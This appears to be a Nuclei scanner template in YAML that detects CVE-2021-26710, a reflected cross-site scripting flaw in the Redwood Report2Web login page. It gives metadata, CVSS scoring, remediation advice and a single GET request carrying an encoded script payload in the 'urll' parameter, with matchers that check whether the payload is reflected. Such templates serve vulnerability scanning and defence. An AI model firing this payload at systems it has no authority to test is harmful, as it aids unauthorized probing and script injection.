52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2021-26710
|
|
|
|
info:
|
|
name: Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Redwood Report2Web 4.3.4.5 and 4.5.3 contains a cross-site scripting vulnerability in the login panel which allows remote attackers to inject JavaScript via the signIn.do urll parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade to the latest version of Redwood Report2Web or apply the vendor-provided patch to fix the XSS vulnerability.
|
|
reference:
|
|
- https://vict0ni.me/report2web-xss-frame-injection.html
|
|
- https://vict0ni.me/redwood-report2web-xss-and-frame-injection/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26710
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-26710
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00114
|
|
epss-percentile: 0.44746
|
|
cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: redwood
|
|
product: report2web
|
|
tags: cve2021,cve,redwood,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402205c436359876340eb592c03cc12f835097f4b6bc047e5fc3af143ac3088f37b340220357ce113e9758c32d25793658fc5636644aa16bca78df98ec9e0f2eb6b2f7ba7:922c64590222798bb761d5b6d8e72950 |